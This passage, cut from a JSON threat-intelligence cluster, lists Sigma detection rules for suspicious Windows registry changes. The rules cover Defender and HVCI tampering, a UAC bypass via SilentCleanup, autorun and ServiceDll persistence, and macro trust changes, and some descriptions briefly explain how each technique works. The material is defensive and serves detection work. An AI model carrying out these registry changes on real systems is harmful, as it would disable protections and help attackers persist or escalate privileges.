"https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/", "https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "value": "Hypervisor Enforced Code Integrity Disabled" }, { "description": "Detects when attackers or tools disable Windows Defender functionalities via the Windows registry", "meta": { "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel", "creation_date": "2022-08-01", "falsepositive": [ "Administrator actions via the Windows Defender interface", "Third party Antivirus" ], "filename": "registry_set_windows_defender_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", "https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", "value": "Disable Windows Defender Functionalities Via Registry Keys" }, { "description": "Detects the setting of the environement variable \"windir\" to a non default value.\nAttackers often abuse this variable in order to trigger a UAC bypass via the \"SilentCleanup\" task.\nThe SilentCleanup task located in %windir%\\system32\\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.\n", "meta": { "author": "frack113, Nextron Systems", "creation_date": "2022-01-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", "value": "Bypass UAC Using SilentCleanup Task" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_classes.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9df5f547-c86a-433e-b533-f2794357e242", "value": "Classes Autorun Keys Modification" }, { "description": "Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-03-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_sentinelone_shell_context_tampering.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://mrd0x.com/sentinelone-persistence-via-menu-context/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "6c304b02-06e6-402d-8be4-d5833cdf8198", "value": "Potential SentinelOne Shell Context Menu Scan Command Tampering" }, { "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_autologger_sessions.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", "value": "Potential AutoLogger Sessions Tampering" }, { "description": "Hides the file extension through modification of the registry", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Administrative scripts" ], "filename": "registry_set_hidden_extention.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/ransomware-families/", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", "value": "Registry Modification to Hidden File Extension" }, { "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "The event doesn't contain information about the type of change. False positives are expected with legitimate changes" ], "filename": "registry_set_winget_admin_settings_tampering.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "value": "Winget Admin Settings Modification" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", "value": "CurrentVersion NT Autorun Keys Modification" }, { "description": "Detects the installation of a new shim database where the file is located in a non-default location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_shim_database_uncommon_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b6976a3-b0e6-4723-ac24-ae38a737af41", "value": "Potential Persistence Via Shim Database In Uncommon Location" }, { "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry.\nThis is often used as a method of persistence.\n", "meta": { "author": "frack113", "creation_date": "2022-02-04", "falsepositive": [ "Administrative scripts", "Installation of a service" ], "filename": "registry_set_servicedll_hijack.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", "value": "ServiceDll Hijack" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "value": "WinSock2 Autorun Keys Modification" }, { "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_add_port_monitor.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "value": "Add Port Monitor Persistence in Registry" }, { "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "value": "Persistence Via Disk Cleanup Handler - Autorun" }, { "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", "meta": { "author": "Austin Songer", "creation_date": "2021-07-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_dns_over_https_enabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/elastic/detection-rules/issues/1371", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1112" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "value": "DNS-over-HTTPS Enabled by Registry" }, { "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2022-06-15", "falsepositive": [ "Administrator actions" ], "filename": "registry_set_enabling_turnoffcheck.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" }, { "description": "Detect set Notification_Suppress to 1 to disable the Windows security center notification", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_suppress_defender_notifications.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "value": "Activate Suppression of Windows Security Center Notifications" }, { "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_hhctrl_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/hhctrl.html", "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", "value": "Persistence Via Hhctrl.ocx" }, { "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate VBScript" ], "filename": "registry_set_bginfo_custom_vbscript.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "992dd79f-dde8-4bb0-9085-6350ba97cfb3", "value": "New BgInfo.EXE Custom VBScript Registry Configuration" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "value": "CurrentControlSet Autorun Keys Modification" }, { "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2022-02-24", "falsepositive": [ "Legitimate disabling of crashdumps" ], "filename": "registry_set_crashdump_disabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" ], "tags": [ "attack.t1564", "attack.t1112" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", "value": "CrashControl CrashDump Disabled" }, { "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via \"BgInfo.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate WMI query" ], "filename": "registry_set_bginfo_custom_wmi_query.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd277474-5c52-4423-a52b-ac2d7969902f", "value": "New BgInfo.EXE Custom WMI Query Registry Configuration" }, { "description": "Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.", "meta": { "author": "Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_access_vbom_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "value": "Trust Access Disable For VBApplications" }, { "description": "Detects potential persistence behavior using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", "meta": { "author": "Lednyov Alexey, oscd.community, Sreeman", "creation_date": "2020-10-16", "falsepositive": [ "Unknown" ], "filename": "registry_set_telemetry_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", "value": "Potential Registry Persistence Attempt Via Windows Telemetry" }, { "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to prepend information to the PATH environment variable on a per-application, per-process basis.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "filename": "registry_set_persistence_app_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://learn.microsoft.com/en-us/windows/win32/shell/app-registration", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" ], "tags": [ "attack.persistence", "attack.t1546.012" ] }, "related": [ { "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", "value": "Potential Persistence Via App Paths Default Property" }, { "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", "meta": { "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "creation_date": "2022-09-29", "falsepositive": [ "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "filename": "registry_set_terminal_server_suspicious.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "value": "RDP Sensitive Settings Changed to Zero" }, { "description": "Detects registry changes to Office trust records where the path is located in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_trust_record_susp_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "value": "Macro Enabled In A Potentially Suspicious Document" }, { "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_eventviewer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 